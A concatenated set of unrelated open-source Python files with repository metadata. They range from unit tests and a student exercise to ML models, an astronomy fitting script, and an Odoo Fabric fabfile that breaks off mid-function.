assert fakeprocess.mock_calls == []
@mock.patch('multiprocessing.Process')
@mock.patch('linkins.script.log')
@mock.patch('subprocess.Popen')
def test_runscript_args(fakepopen, fakelog, fakeprocess):
proc = fakepopen.return_value
poll = proc.poll
poll.return_value = 0
read = proc.stdout.read
read.side_effect = iter('')
script.runscript('/foo/bar', 'fee', 'fi', 'fo')
popen = util.mock_call_with_name(
'',
['/foo/bar', 'fee', 'fi', 'fo'],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
universal_newlines=True,
)
read = mock.call().stdout.read(1)
close = mock.call().stdout.close()
popen_calls = [
popen,
read,
close,
]
assert fakepopen.mock_calls == popen_calls
assert fakelog.mock_calls == []
assert fakeprocess.mock_calls == []
@mock.patch('multiprocessing.Process')
@mock.patch('linkins.script.log')
@mock.patch('subprocess.Popen')
def test_runscript_name(fakepopen, fakelog, fakeprocess):
proc = fakepopen.return_value
poll = proc.poll
poll.return_value = 0
read = proc.stdout.read
read.side_effect = iter('foo\n')
script.runscript('/foo/bar', name='foo-name')
popen = util.mock_call_with_name(
'',
['/foo/bar'],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
universal_newlines=True,
)
read = mock.call().stdout.read(1)
reads = [read]*5
close = mock.call().stdout.close()
out_log = util.mock_call_with_name(
'info',
'foo',
extra={'source': 'SCRIPT', 'script': 'foo-name'},
)
popen_calls = [
popen,
]
popen_calls += reads
popen_calls.append(close)
log_calls = [
out_log,
]
assert fakepopen.mock_calls == popen_calls
assert fakelog.mock_calls == log_calls
assert fakeprocess.mock_calls == []
@mock.patch('multiprocessing.Process')
@mock.patch('linkins.script.log')
@mock.patch('subprocess.Popen')
def test_runscript_multiprocess(fakepopen, fakelog, fakeprocess):
script.runscript('/foo/bar', multiprocess=True)
assert fakepopen.mock_calls == []
assert fakelog.mock_calls == []
process = mock.call(
target=script._run,
args=(['/foo/bar'], 'bar'),
)
start = mock.call().start()
calls = [
process,
start,
]
assert fakeprocess.mock_calls == calls
@mock.patch('multiprocessing.Process')
@mock.patch('linkins.script.log')
@mock.patch('subprocess.Popen')
def test_runscript_while_loop(fakepopen, fakelog, fakeprocess):
proc = fakepopen.return_value
poll = proc.poll
poll.side_effect = [None, 0, 0]
read = proc.stdout.read
def forever():
yield 'f'
yield '\n'
yield ''
yield ''
raise AssertionError('Looping forever')
read.side_effect = forever()
script.runscript('/foo/bar')
popen = util.mock_call_with_name(
'',
['/foo/bar'],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT,
universal_newlines=True,
)
popen_calls = [
popen,
]
read = mock.call().stdout.read(1)
reads = [read]*3
popen_calls += reads
poll = mock.call().poll()
polls = [poll]*2
popen_calls += polls
popen_calls += [
mock.call().stdout.read(1),
mock.call().poll(),
]
close = mock.call().stdout.close()
popen_calls.append(close)
f_log = util.mock_call_with_name(
'info',
'f',
extra={'source': 'SCRIPT', 'script': 'bar'},
)
empty_log = util.mock_call_with_name(
'info',
'',
extra={'source': 'SCRIPT', 'script': 'bar'},
)
log_calls = [
f_log,
empty_log,
]
assert fakepopen.mock_calls == popen_calls
assert fakelog.mock_calls == log_calls
assert fakeprocess.mock_calls == []
|
thelinuxkid/linkins
|
linkins/test/test_script.py
|
Python
|
mit
| 4,969
|
#!/usr/bin/env python
""" Assignment 1, Exercise 3, INF1340, Fall, 2015. Troubleshooting Car Issues.
This module contains one function diagnose_car(). It is an expert system to
interactive diagnose car issues.
"""
__author__ = 'Susan Sim'
__email__ = "ses@drsusansim.org"
__copyright__ = "2015 Susan Sim"
__license__ = "MIT License"
def diagnose_car():
"""
Interactively queries the user with yes/no questions to identify a
possible issue with a car.
Inputs: Y or N
Expected Outputs: Display proceeding diagnosis until final solution is provided
Errors: Any other entry besides Y and N will result in an error
Test Case:
#Input:Y
#Expected Output: Display Are the battery terminals corroded? (Y/N):
#Input:YY
#Expected Output: Display Clean terminals and try starting again.
#Input:YN
#Expected Output: Display Replace cables and try again.
#Input:N
#Expected Output: Display Does the car make a clicking noise? (Y/N):
#Input:NY
#Expected Output: DisplayReplace the battery
#Input:NN
#Expected Output: Display Does the car crank up but fail to start? (Y/N):
#Input:NNY
#Expected Output: Display Check spark plug connections.
#Input:NNN
#Expected Output: Display Does the engine start and then die? (Y/N):
#Input:NNNY
#Expected Output: Display Does your car have fuel injection? (Y/N):
#Input:NNNYN
#Expected Output: Display Check to ensure the choke is opening and closing.
#Input:NNNYY
#Expected Output: Display Get it in for service.
#Input:NNNN
#Expected Output: Display Engine is not getting enough fuel. Clean fuel pump.
#Input: Anything other than Y and N
#Expected Output: Display Error: This answer is invalid. Only answer Y or N.
"""
user_input = raw_input('Is the car silent when you turn the key? (Y/N):')
if user_input == "Y":
user_input = raw_input('Are the battery terminals corroded? (Y/N):')
if user_input == "Y":
print('Clean terminals and try starting again.')
elif user_input == "N":
print('Replace cables and try again.')
elif user_input == "N":
user_input = raw_input('Does the car make a clicking noise? (Y/N):')
if user_input == "Y":
print('Replace the battery.')
elif user_input == "N":
user_input = raw_input('Does the car crank up but fail to start? (Y/N):')
if user_input == "Y":
print('Check spark plug connections.')
elif user_input == "N":
user_input = raw_input('Does the engine start and then die? (Y/N):')
if user_input == "Y":
user_input = raw_input('Does your car have fuel injection? (Y/N):')
if user_input == "N":
print('Check to ensure the choke is opening and closing.')
elif user_input == "Y":
print('Get it in for service.')
elif user_input == "N":
print('Engine is not getting enough fuel. Clean fuel pump.')
else:
print('Error: This answer is invalid. Only answer Y or N.')
#diagnose_car()
|
susanshen/inf1340_2015_asst1
|
exercise3.py
|
Python
|
mit
| 3,239
|
from django.contrib import admin
from Stations.models import Station, Sensor
class StationAdmin(admin.ModelAdmin):
prepopulated_fields = {'slug': ('name',)}
class SensorAdmin(admin.ModelAdmin):
repopulated_fields = {
'slug': ('sensor_type', 'height',),
}
# Register your models here.
admin.site.register(Station, StationAdmin)
admin.site.register(Sensor, SensorAdmin)
|
sschultz/FHSU-GSCI-Weather
|
Stations/admin.py
|
Python
|
mit
| 405
|
class DatabaseConnection(object):
HOST = 'databaseurl.com'
PORT = '5432'
USERNAME = 'test_user'
|
jjensenmike/python
|
import_constants/config.py
|
Python
|
mit
| 108
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Fri May 19 12:32:10 2017
@author: wd
"""
import math
import tensorflow as tf
import numpy as np
cnn = np.load('/home/wd/Workspace/RL/dqn_cnn.npy')
# w3, w4, cnn,
class DQN:
def __init__(self, sess, weight, w1, w2, w3, cnn_eye, bias, input_size, output_size, name = 'main'):
self.sess = sess
self.weight = weight
self.cnn = cnn_eye
self.w1 = w1
self.w2 = w2
self.w3 = w3
self.bias = bias
self.input_size = input_size
self.output_size = output_size
self.filter_sizes = [5, 5, 7, 1]
self.net_name = name
self._build_network()
def _build_network(self, h_size=256, l_rate=1e-3):
with tf.variable_scope(self.net_name):
self._X = tf.placeholder(tf.float32, [None, self.input_size])
self._H = tf.placeholder(tf.float32, [None, 50])
self._Y = tf.placeholder(dtype = tf.float32)
self.x_tensor = tf.reshape(self._X, [-1, 28, 28, 1])
self.current_input = self.x_tensor
self.cnn_save = []
for layer_i, n_output in enumerate([64, 128, 256 , 512]):
n_input = self.current_input.get_shape().as_list()[3]
W = tf.Variable(
tf.random_uniform([
self.filter_sizes[layer_i],
self.filter_sizes[layer_i],
n_input, n_output],
-1.0 / math.sqrt(n_input),
1.0 / math.sqrt(n_input)), name = 'CNN')
b = tf.Variable(tf.zeros([n_output]))
if 2 > layer_i:
# batch_mean, batch_var = tf.nn.moments(tf.nn.conv2d(
# self.current_input, W, strides=[1, 2, 2, 1], padding='SAME'), [0,1,2])
# beta = tf.Variable(tf.constant(0.0, shape = [n_output]))
# gamma = tf.Variable(tf.constant(1.0, shape = [n_output]))
self.cnn_save.append(W)
self.output = tf.nn.relu(tf.nn.max_pool(
#
tf.add(tf.nn.conv2d(
self.current_input, W, strides=[1, 1, 1, 1], padding='SAME'), b), ksize=[1,2,2,1],\
strides=[1,2,2,1],padding='SAME'))
self.current_input = self.output
self.current_intput = tf.nn.dropout(self.current_input, keep_prob = 0.7)
elif 2 <= layer_i:
# batch_mean, batch_var = tf.nn.moments(tf.nn.conv2d(
# self.current_input, W, strides=[1, 2, 2, 1], padding='VALID'), [0,1,2])
# beta = tf.Variable(tf.constant(0.0, shape = [n_output]))
# gamma = tf.Variable(tf.constant(1.0, shape = [n_output]))
self.cnn_save.append(W)
self.output = tf.nn.relu(
tf.add(tf.nn.conv2d(
self.current_input, W, strides=[1, 1, 1, 1], padding='VALID'), b))
self.current_input = self.output
self.current_input = tf.nn.dropout(self.current_input, keep_prob = 0.7)
self.current_input = tf.reshape(self.current_input, [-1, 512])
self.fc_input = tf.concat(1,[self.current_input, self._H])
#First layer of weights
self.W1 = tf.get_variable("W1", shape=[562, h_size],
initializer = tf.contrib.layers.xavier_initializer())
# layer1 = tf.nn.dropout(tf.nn.tanh(tf.matmul(self.fc_input, self.W1)), keep_prob =0.7)
layer1 = tf.nn.relu(tf.matmul(self.fc_input, self.W1))
#second layer of weights
self.W2 = tf.get_variable("W2", shape=[h_size, 5],
initializer = tf.contrib.layers.xavier_initializer())
self._Qpred = tf.nn.dropout(tf.matmul(layer1, self.W2), keep_prob = 0.7)
#We need to define the parts of the network needed for learning a policy
self.est_value = tf.squeeze(tf.nn.softmax(self._Qpred))
#Loss function
self._loss = tf.squared_difference(self.est_value, self._Y)
#Learning
self._train = tf.train.AdamOptimizer(
learning_rate=l_rate).minimize(self._loss)
def predict(self,state, history):
# x = np.reshape(self.get_processed_state(state), [None, 256])
x = np.reshape(state, [1,784])
# print(history)
# print (np.shape(np.asarray(history)))
h = np.reshape(np.asarray(history), [1, 50])
return self.sess.run(self.est_value, feed_dict = {self._X: x, self._H : h})
def update(self, x_stack, y_stack, h_stack):
return self.sess.run([self._loss, self._train], feed_dict={
self._X: x_stack, self._Y: y_stack, self._H: h_stack})
def save(self):
return self.sess.run(self.W3)
def save2(self):
return self.sess.run(self.W4)
def savecnn(self):
return self.sess.run(self.cnn_save)
def savecnn2(self):
return self.sess.run(self.cnn_2_save)
def save_w1(self):
return self.sess.run(self.W1)
def save_w2(self):
return self.sess.run(self.W2)
|
blackpigg/RL_landmark_finder
|
PG_value.py
|
Python
|
mit
| 5,462
|
"""
pgoapi - Pokemon Go API
Copyright (c) 2016 tjado <https://github.com/tejado>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE
OR OTHER DEALINGS IN THE SOFTWARE.
Author: tjado <https://github.com/tejado>
"""
from __future__ import absolute_import
from pgoapi.exceptions import PleaseInstallProtobufVersion3
import pkg_resources
import logging
__title__ = 'pgoapi'
__version__ = '1.1.5'
__author__ = 'tjado'
__license__ = 'MIT License'
__copyright__ = 'Copyright (c) 2016 tjado <https://github.com/tejado>'
protobuf_exist = False
protobuf_version = 0
try:
protobuf_version = pkg_resources.get_distribution("protobuf").version
protobuf_exist = True
except:
pass
if (not protobuf_exist) or (int(protobuf_version[:1]) < 3):
raise PleaseInstallProtobufVersion3()
from pgoapi.pgoapi import PGoApi
from pgoapi.rpc_api import RpcApi
from pgoapi.auth import Auth
logging.getLogger("pgoapi").addHandler(logging.NullHandler())
logging.getLogger("rpc_api").addHandler(logging.NullHandler())
logging.getLogger("utilities").addHandler(logging.NullHandler())
logging.getLogger("auth").addHandler(logging.NullHandler())
logging.getLogger("auth_ptc").addHandler(logging.NullHandler())
logging.getLogger("auth_google").addHandler(logging.NullHandler())
try:
import requests.packages.urllib3
requests.packages.urllib3.disable_warnings()
except:
pass
|
superfsm/pgoapi
|
pgoapi/__init__.py
|
Python
|
mit
| 2,311
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import logging
__author__ = 'tchen'
logger = logging.getLogger(__name__)
from django.contrib.sites.models import Site
def site(request):
import karp
return {
'site': Site.objects.get_current(),
'version': karp.__version__,
}
|
tyrchen/karp
|
karp/context_processors.py
|
Python
|
mit
| 321
|
from unittest import TestCase
from tests.assertions import CustomAssertions
import numpy as np
from floq.helpers.matrix import is_unitary, adjoint, gram_schmidt, norm, product
class TestIsUnitary(TestCase):
def test_true_if_unitary(self):
u = np.array([[-0.288822 - 0.154483j, 0.20768 - 0.22441j, 0.0949032 - 0.0560178j, -0.385994 + 0.210021j, 0.423002 - 0.605778j, 0.135684 - 0.172261j], [0.0998628 - 0.364186j, 0.408817 - 0.35846j, -0.224508 - 0.550201j, 0.258427 + 0.263299j, -0.0297947 + 0.180679j, -0.0134853 + 0.197029j], [0.541087 - 0.216046j, -0.306777 + 0.0439077j, -0.479354 + 0.0395382j, -0.474755 + 0.264776j, -0.0971467 - 0.0167121j, 0.121192 - 0.115168j], [-0.0479833 - 0.133938j, 0.0696875 - 0.539678j, 0.314762 + 0.391157j, -0.376453 + 0.00569747j, -0.348676 + 0.2061j, 0.0588683 + 0.34972j], [-0.524482 + 0.213402j, 0.152127 + 0.111274j, -0.308402 - 0.134059j, -0.448647 + 0.120202j, -0.0680734 + 0.435883j, -0.295969 - 0.181141j], [-0.119405 + 0.235674j, 0.349453 + 0.247169j, -0.169971 + 0.0966179j, 0.0310919 + 0.129778j, -0.228356 + 0.00511762j, 0.793243 + 0.0977203j]])
self.assertTrue(is_unitary(u, 1e-5))
def test_true_if_not_unitary(self):
u = np.array([[-5.288822 - 0.154483j, 0.20768 - 0.22441j, 0.0949032 - 0.0560178j, -0.385994 + 0.210021j, 0.423002 - 0.605778j, 0.135684 - 0.172261j], [0.0998628 - 0.364186j, 0.408817 - 0.35846j, -0.224508 - 0.550201j, 0.258427 + 0.263299j, -0.0297947 + 0.180679j, -0.0134853 + 0.197029j], [0.541087 - 0.216046j, -0.306777 + 0.0439077j, -0.479354 + 0.0395382j, -0.474755 + 0.264776j, -0.0971467 - 0.0167121j, 0.121192 - 0.115168j], [-0.0479833 - 0.133938j, 0.0696875 - 0.539678j, 0.314762 + 0.391157j, -0.376453 + 0.00569747j, -0.348676 + 0.2061j, 0.0588683 + 0.34972j], [-0.524482 + 0.213402j, 0.152127 + 0.111274j, -0.308402 - 0.134059j, -0.448647 + 0.120202j, -0.0680734 + 0.435883j, -0.295969 - 0.181141j], [-0.119405 + 0.235674j, 0.349453 + 0.247169j, -0.169971 + 0.0966179j, 0.0310919 + 0.129778j, -0.228356 + 0.00511762j, 0.793243 + 0.0977203j]])
self.assertFalse(is_unitary(u))
class TestAdjoint(CustomAssertions):
def test_does_right_thing(self):
u = np.array([[2.3+12j, -13j+5], [1j+12.1, 0.3j+0.1]])
target = np.array([[2.3-12j, -1j+12.1], [+13j+5, -0.3j+0.1]])
self.assertArrayEqual(adjoint(u), target)
class TestGramSchmidt(CustomAssertions):
def setUp(self):
self.array = np.array([[1.0j, 2.0, 3.0],
[0.0+0.2j, 1.0, 1.0],
[3.0, 2.0, 1.0]])
self.res = gram_schmidt(self.array)
self.x = self.res[0]
self.y = self.res[1]
self.z = self.res[2]
def test_orthogonality_x_y(self):
self.assertAlmostEqual(product(self.x, self.y), 0.0)
def test_orthogonality_x_z(self):
self.assertAlmostEqual(product(self.x, self.z), 0.0)
def test_orthogonality_y_z(self):
print self.y
print self.z
self.assertAlmostEqual(product(self.y, self.z), 0.0)
def test_normalised_x(self):
self.assertAlmostEqual(norm(self.x), 1.0)
def test_normalised_y(self):
self.assertAlmostEqual(norm(self.y), 1.0)
def test_normalised_z(self):
self.assertAlmostEqual(norm(self.z), 1.0)
|
sirmarcel/floq
|
tests/helpers/test_matrix.py
|
Python
|
mit
| 3,297
|
from django.db import models
import hashlib
import time
import sys
def _createHash():
hash = hashlib.sha1()
hash.update(str(time.time()).encode('utf-8'))
return hash.hexdigest()[:-10]
class Session(models.Model):
data = models.CharField(max_length=sys.maxsize)
hash = models.CharField(max_length=10,default=_createHash,unique=True)
|
martynvandijke/Stargazer
|
stargazer/simulator/models.py
|
Python
|
mit
| 355
|
import numpy as np
import pdb
from scipy.special import digamma
import logging
iter_num = 5
np.seterr(over='raise')
def exp_proportion(theta):
exp_theta = np.exp(theta)
return exp_theta / np.sum(exp_theta)
def update_variables(X, theta_1, theta_2, q_z, beta, labels, lbda, rho, u, it):
DOC_NUM, VOCAB_SIZE = X.shape
labeled = [x for x in range(DOC_NUM) if labels[x] != -1]
unlabeled = [x for x in range(DOC_NUM) if labels[x] == -1]
total = 0
for itt in range(iter_num):
logging.info("Updating topics; iter: %d" % itt)
new_beta = np.ones(beta.shape)
for x in labeled + unlabeled:
weight = 1 if labels[x] != -1 else 1
# update theta
#Ez = np.sum(q_z[x][w] * X[x, w] for w in q_z[x])
Ez = np.sum(tp[1] * tp[2] for tp in q_z[x])
pi = exp_proportion(theta_1[x])
#if labels[x] != -1 and it:
if labels[x] != -1:
theta_1[x] = (Ez - np.sum(Ez) * pi) / rho + theta_2[x] - u[x]
else:
theta_1[x] = (Ez - np.sum(Ez) * pi) * lbda
# update q_z
eta_hessian = np.asmatrix(pi).T * np.asmatrix(pi) - np.diag(pi)
#if labels[x] != -1 and it:
if labels[x] != -1:
Sigma = eta_hessian * np.sum(Ez) - rho
else:
Sigma = eta_hessian * np.sum(Ez) - 1 / lbda
Eq = theta_1[x] - np.log(np.sum(np.exp(theta_1[x]))) + 1 / 2 * np.trace(eta_hessian * Sigma)
for tp in q_z[x]:
qz = Eq + np.log(beta[:, tp[0]])
qz = np.exp(qz)
#q_z[x][w] = qz / np.sum(qz)
tp[2] = qz / np.sum(qz)
#new_beta[:, w] += q_z[x][w] * X[x, w]
new_beta[:, tp[0]] += weight * tp[1] * tp[2]
# update beta
new_beta /= np.sum(new_beta, axis=1)[:, np.newaxis]
logging.info(np.linalg.norm(new_beta - beta))
beta = new_beta
return theta_1, q_z, beta
def dtm_update(X, W, topic_num, theta, phi, it_num, dic):
DOC_NUM, VOCAB_SIZE = X.shape
gamma = 0.1
def Q(theta):
total = 0
for x in range(DOC_NUM):
'''
for y in range(VOCAB_SIZE):
'''
for y in dic[x]:
post = np.multiply(theta[x, :], phi[:, y])
post /= np.sum(post)
total += X[x, y] * np.dot(post, np.log(theta[x, :]) + np.log(phi[:, y]))
return total
def R(theta):
dist = np.zeros((DOC_NUM, DOC_NUM))
for x in range(DOC_NUM):
dist[x] = np.linalg.norm(theta[x] - theta, axis=1)**2
return np.sum(dist) / np.sum(np.multiply(W, dist))
for _ in range(it_num):
print _
new_phi = np.ones(phi.shape) * .01
for x in range(DOC_NUM):
'''
for y in range(VOCAB_SIZE):
'''
for y in dic[x]:
post = np.multiply(theta[x, :], phi[:, y])
post /= np.sum(post)
new_phi[:, y] += post * X[x, y]
new_phi /= np.sum(new_phi, axis=1)[:, np.newaxis]
phi = new_phi
theta_1 = np.copy(theta)
dist = np.zeros((DOC_NUM, DOC_NUM))
for x in range(DOC_NUM):
dist[x] = np.linalg.norm(theta[x] - theta, axis=1)**2
alpha = R(theta)
for k in range(topic_num):
for x in range(DOC_NUM):
beta = (DOC_NUM * theta_1[x, k] + alpha * np.dot(W[x, :], theta_1[:, k])) / (np.sum(theta_1[:, k]) + alpha * np.sum(W[x, :]) * theta_1[x, k])
if theta_1[x, k] > 0 and beta > 1 / theta_1[x, k]:
beta = 0.99 / theta_1[x, k]
'''
if beta * theta_1[x, k] == 1:
theta_1[x] = .01
theta_1[x, k] = 1 - .01 * (topic_num - 1)
'''
coef = (1 - beta * theta_1[x, k]) / (1 - theta_1[x, k])
theta_1[x] *= coef
theta_1[x, k] /= coef
theta_1[x, k] *= beta
if np.any(theta_1 <= 0):
theta_1 += .01
theta_1 /= np.sum(theta_1, axis=1)[:, np.newaxis]
Q1 = Q(theta)
Q2 = Q(theta_1)
if Q2 > Q1:
theta = theta_1
print Q2
else:
print "Q1 not improved"
theta_2 = np.ones(theta_1.shape) * .01
for x in range(DOC_NUM):
#for y in range(VOCAB_SIZE):
for y in dic[x]:
post = np.multiply(theta_1[x, :], phi[:, y])
post /= np.sum(post)
theta_2[x] += post * X[x, y]
theta_2 /= np.sum(theta_2, axis=1)[:, np.newaxis]
if np.any(theta_2 <= 0):
pdb.set_trace()
theta_3 = np.copy(theta_1)
s = 0.
while True:
print s
theta_3 += gamma * (theta_2 - theta_1)
s += gamma
Q1 = Q(theta_3)
Q2 = Q(theta)
if Q1 > Q2 and R(theta_3) > R(theta):
theta = theta_3
gamma = .1
print Q1
break
elif s >= 9 * gamma:
gamma /= 4
break
return theta, phi
|
wenchaodudu/SNLDA
|
lda.py
|
Python
|
mit
| 5,422
|
"""
High-level fitting and plotting example with MulensModel.
Requires in-line argument which is a config file, e.g.,
example_15_mb07192_v1.cfg or example_15_ob05390_v1.cfg.
"""
import os
import sys
import numpy as np
import emcee
from matplotlib import pyplot as plt
import configparser
import MulensModel as mm
import example_15_read as read
def ln_like(theta, event, parameters_to_fit, print_models):
"""
Likelihood function. The values of *parameters_to_fit* are in *theta*.
MulensModel Event class instance *event* gives event for which
calculations will be done. Boolean *print_models* controls if
all models are printed.
"""
for (theta_, param) in zip(theta, parameters_to_fit):
setattr(event.model.parameters, param, theta_)
chi2 = event.get_chi2()
if print_models:
print(chi2, *[t for t in theta], flush=True)
return -0.5 * chi2
def ln_prior(theta, parameters_to_fit):
"""
Prior. Check if *theta* values for *parameters_to_fit* are within ranges
defined by *ln_prior.min* and *ln_prior.max*.
"""
inside = 0.
outside = -np.inf
for (parameter, value) in ln_prior.min.items():
index = parameters_to_fit.index(parameter)
if theta[index] < value:
return outside
for (parameter, value) in ln_prior.max.items():
index = parameters_to_fit.index(parameter)
if theta[index] > value:
return outside
return inside
def ln_prob(
theta, event, parameters_to_fit, print_models=False):
"""
Log probability of the model - combines ln_prior() and ln_like().
"""
ln_prior_ = ln_prior(theta, parameters_to_fit)
if not np.isfinite(ln_prior_):
return -np.inf
ln_like_ = ln_like(theta, event, parameters_to_fit, print_models)
if np.isnan(ln_like_):
return -np.inf
return ln_prior_ + ln_like_
def generate_random_parameters(parameters, starting, n):
"""
Generate *n* vectors of values of *parameters* according to distributions
specified in *starting*.
"""
values = []
for param in parameters:
settings = starting[param]
if settings[0] == 'gauss':
v = settings[2] * np.random.randn(n)
v += settings[1]
elif settings[0] == 'uniform':
v = np.random.uniform(
low=settings[1], high=settings[2], size=n)
elif settings[0] == 'log-uniform':
beg = np.log(settings[1])
end = np.log(settings[2])
v = np.exp(np.random.uniform(beg, end, n))
else:
raise ValueError('Unrecognized keyword: ' + settings[0])
values.append(v)
return np.array(values).T.tolist()
# Read config file.
if len(sys.argv) != 2:
raise ValueError('Exactly one argument needed - cfg file')
config_file = sys.argv[1]
config = configparser.ConfigParser()
config.optionxform = str # So that "t_E" is not changed to "t_e".
config.read(config_file)
files = read.read_files_from_config(config)
model_settings = read.read_model_settings(config)
(parameters, starting) = read.read_parameters_start(config)
fixed_parameters = read.read_fix_parameters(config)
(min_values, max_values) = read.read_min_max(config)
ln_prior.min = min_values
ln_prior.max = max_values
emcee_settings = read.read_emcee_settings(config)
other_settings = read.read_other(config)
# Read photometric data.
datasets = [mm.MulensData(file_name=f[0], phot_fmt=f[1]) for f in files]
# Generate starting values of parameters.
start = generate_random_parameters(parameters, starting,
emcee_settings['n_walkers'])
# Setup Event instance that combines model and data.
par = dict(zip(parameters, start[0]))
par = {**par, **fixed_parameters}
my_model = mm.Model(par, coords=model_settings['coords'])
if 'methods' in model_settings:
my_model.set_magnification_methods(model_settings['methods'])
if 'default_method' in model_settings:
my_model.set_default_magnification_method(model_settings['default_method'])
my_event = mm.Event(datasets=datasets, model=my_model)
# Prepare sampler.
n_dim = len(parameters)
print_models = other_settings.get('print_models', False)
args = (my_event, parameters, print_models)
sampler = emcee.EnsembleSampler(emcee_settings['n_walkers'], n_dim, ln_prob,
args=args)
# Run sampler.
sampler.run_mcmc(start, emcee_settings['n_steps'])
# Parse results.
burn = emcee_settings['n_burn']
samples = sampler.chain[:, burn:, :].reshape((-1, n_dim))
r_16 = np.percentile(samples, 16, axis=0)
r_50 = np.percentile(samples, 50, axis=0)
r_84 = np.percentile(samples, 84, axis=0)
print("Fitted parameters:")
for i in range(n_dim):
if parameters[i] == 'q':
fmt = "{:} {:.7f} +{:.7f} -{:.7f}"
else:
fmt = "{:} {:.5f} +{:.5f} -{:.5f}"
print(fmt.format(parameters[i], r_50[i], r_84[i]-r_50[i], r_50[i]-r_16[i]))
# We extract best model parameters and chi2 from the chain:
prob = sampler.lnprobability[:, burn:].reshape((-1))
best_index = np.argmax(prob)
best_chi2 = prob[best_index] / -0.5
best = samples[best_index, :]
print("\nSmallest chi2 model:")
print(*[repr(b) if isinstance(b, float) else b.value for b in best])
print(best_chi2)
for (i, parameter) in enumerate(parameters):
setattr(my_event.model.parameters, parameter, best[i])
my_event.fit_fluxes()
# Plot results.
ln_like(best, my_event, parameters, False) # This allows plotting of
# the best model.
print(my_event.model)
my_event.plot_data(subtract_2450000=True)
my_event.plot_model(
subtract_2450000=True,
t_start=other_settings['plot_time'][0]+2450000.,
t_stop=other_settings['plot_time'][1]+2450000.)
plt.xlim(*other_settings['plot_time'])
plt.show()
|
rpoleski/MulensModel
|
examples/example_15_fitting.py
|
Python
|
mit
| 5,757
|
#!/usr/bin/env python
sx=0
sy=0
rx=0
ry=0
total = 2
houses = set()
houses.add( (0,0) ) # starting point
with open("../input/03.txt") as fileobj:
for word in fileobj:
for ch in word:
total+=1
if total % 2 == 0: # santa
if ch == '^':
sx+=1
if ch == 'v':
sx-=1
if ch == '<':
sy-=1
if ch == '>':
sy+=1
houses.add( (sx,sy) )
else: # robo-santa
if ch == '^':
rx+=1
if ch == 'v':
rx-=1
if ch == '<':
ry-=1
if ch == '>':
ry+=1
houses.add( (rx,ry) )
print "total presents: %s" % total
print "total houses visited: %s" % len(houses)
|
dsumike/adventofcode
|
python/03p2.py
|
Python
|
mit
| 628
|
import os
import sys
import glob
import datetime
import erppeek
import xmlrpclib
from fabric.api import task, hosts
from fabric.api import local, env, prompt, execute, lcd, run, put
from fabric.context_managers import quiet
from fabric import colors
# see: http://fabric.readthedocs.org/en/1.8/usage/execution.html#leveraging-native-ssh-config-files
env.use_ssh_config = True
env.TS = datetime.datetime.now().strftime("%Y-%m-%d-%H-%M-%S")
env.odoo_database = os.environ.get("ODOO_DATABASE", "wochenbericht")
env.odoo_admin_user = os.environ.get("ODOO_ADMIN_USER", "admin")
env.odoo_admin_pw = os.environ.get("ODOO_ADMIN_PASS", "12345")
env.odoo_modules = ["wochenbericht"]
env.odoo_location = os.path.expanduser("~/develop/nexiles/odoo")
env.odoo_snapshot = "sql/{odoo_database}-snapshot-{TS}.dump".format(**env)
def get_last_snapshot():
# Try to get latest snapshot
snapshots = glob.glob("sql/{odoo_database}-snapshot*.dump".format(**env))
if snapshots:
env.latest_snapshot = snapshots[-1]
def set_database_name(database):
if hasattr(set_database_name, "firstrun"):
print colors.yellow("Setting database: {}".format(database))
set_database_name.firstrun = True
env.odoo_database = database
env.odoo_snapshot = "sql/{odoo_database}-snapshot-{TS}.dump".format(**env)
get_last_snapshot()
def get_odoo_client():
return erppeek.Client("http://localhost:8069", db=env.odoo_database, user=env.odoo_admin_user, password=env.odoo_admin_pw)
set_database_name(env.odoo_database)
if not os.path.exists(os.path.join(env.odoo_location, "odoo.py")):
print colors.red("No odoo checkout found in {odoo_location} -- abort".format(**env))
sys.exit(10)
######################################################################
# Building
@task
def build():
"""Build module"""
# nothing fancy for now
with lcd("docs"):
local("make html")
local("rst2html.py docs/changelog.rst > src/nexiles_odoo/static/description/index.html")
######################################################################
# Development tasks
@task(alias="start")
def start_odoo(database=None, update=None):
"""Fire up odoo"""
if database:
set_database_name(database)
if not update:
local("{odoo_location}/odoo.py --addons-path ./addons,{odoo_location}/addons --database {odoo_database} --logfile=odoo.log".format(**env))
else:
print colors.red("Updating modules: {}".format(update))
local("{odoo_location}/odoo.py --addons-path ./addons,{odoo_location}/addons --database {odoo_database} --update {update} --logfile=odoo.log".format(update=update, **env))
@task
def replay(database=None, update=None):
"""Instant Replay -- restore to last snapshot and startup odoo."""
if database:
env.odoo_database = database
get_last_snapshot()
execute(restore)
execute(start_odoo, database, update)
@task
def snapshot(database=None):
"""Snapshot database"""
if database:
set_database_name(database)
# NOTE:
# the x and O options basically ignore users and permissions.
# This is probably a bad idea in production ....
local("pg_dump -x -O -Fc -f {odoo_snapshot} {odoo_database}".format(**env))
@task
def restore(database=None):
"""Restore to newest snapshot"""
if database:
set_database_name(database)
if "latest_snapshot" not in env:
print colors.red("No snapshot found -- abort.")
return
print colors.yellow("I'm going to drop the database {odoo_database} and restore from {latest_snapshot}.".format(**env))
prompt(colors.red("press enter to continue"))
local("dropdb {odoo_database}".format(**env))
local("createdb -T template0 {odoo_database}".format(**env))
local("pg_restore -O -d {odoo_database} {latest_snapshot}".format(**env))
@task(alias="update")
def update_modules(database=None, modules=None):
"""Update modules. Requires running odoo."""
if database is not None:
set_database_name(database)
if modules is not None:
